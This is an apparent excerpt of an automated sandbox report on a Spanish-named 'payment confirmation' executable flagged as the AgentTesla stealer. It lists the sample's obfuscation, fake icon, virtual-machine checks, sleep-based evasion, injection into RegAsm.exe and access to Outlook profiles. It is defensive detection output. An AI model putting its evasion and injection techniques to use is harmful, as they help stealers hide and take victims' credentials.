                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: Confirmaci#U00f3n de pago_shrunk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Confirmaci#U00f3n de pago_shrunk.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Confirmaci#U00f3n de pago_shrunk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: CVNXGJKDF133.pdb source: Confirmaci#U00f3n de pago_shrunk.exe

                      Data Obfuscation

                      barindex
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: Confirmaci#U00f3n de pago_shrunk.exe, xH7xY1j4BcGQ4LPh3D.cs.Net Code: Type.GetTypeFromHandle(Odbuv6HxWjHwueiGji.aNMNDRPXQcyPS(16777254)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(Odbuv6HxWjHwueiGji.aNMNDRPXQcyPS(16777255)),Type.GetTypeFromHandle(Odbuv6HxWjHwueiGji.aNMNDRPXQcyPS(16777252))})
                      Source: Confirmaci#U00f3n de pago_shrunk.exeStatic PE information: 0xAEC31ED1 [Wed Nov 29 10:49:53 2062 UTC]
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeCode function: 0_2_02D64A80 push esi; iretd 0_2_02D64A81
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeCode function: 0_2_02D65676 pushad ; ret 0_2_02D65677
                      Source: Confirmaci#U00f3n de pago_shrunk.exe, i74psymjnMJvjAT5sZ.csHigh entropy of concatenated method names: 'dqNoP9MvuT', 'Y7Aob37hU8', 'QaMoNWP4xB', 'IXQoGJ5Plu', 'oC9oI6RlVg', 'HgqozmYsFC', 'FGy3nT2at9', 'Fon3o2SSkI', 'lOH33d0ud5', 'ccx3Cl0Ra8'
                      Source: Confirmaci#U00f3n de pago_shrunk.exe, xH7xY1j4BcGQ4LPh3D.csHigh entropy of concatenated method names: 'p4eoeiS1Ce', 'IJQNDRfPxmpxs', 'PseDWPkon', 'eInqklcMl', 'SJDFGaA5E', 'Fqp6yLoLW', 'GBN017qoM', 'Y4QpbCxPg', 'xojOBRJT6', 'M0OSgjXpB'

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Icon mismatch, binary includes an icon from a different legit application in order to fool users
                      Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (92).png
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeMemory allocated: 2D60000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeMemory allocated: 2F80000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeMemory allocated: 2D80000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2EC0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 30F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2EC0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe TID: 3832Thread sleep count: 318 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe TID: 3832Thread sleep count: 154 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe TID: 6064Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe TID: 2884Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: Confirmaci#U00f3n de pago_shrunk.exe, 00000000.00000002.1460095411.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2695878398.000000000123F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Allocates memory in foreign processes
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                      Writes to foreign memory regions
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43C000Jump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43E000Jump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: FE6008Jump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeQueries volume information: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Confirmaci#U00f3n de pago_shrunk.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.40d5950.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.4060508.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.409af30.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.40d5950.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.409af30.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Confirmaci#U00f3n de pago_shrunk.exe.4060508.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.2696679944.000000000313E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2695484227.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2696679944.000000000315A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2696679944.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1461485976.0000000003F89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
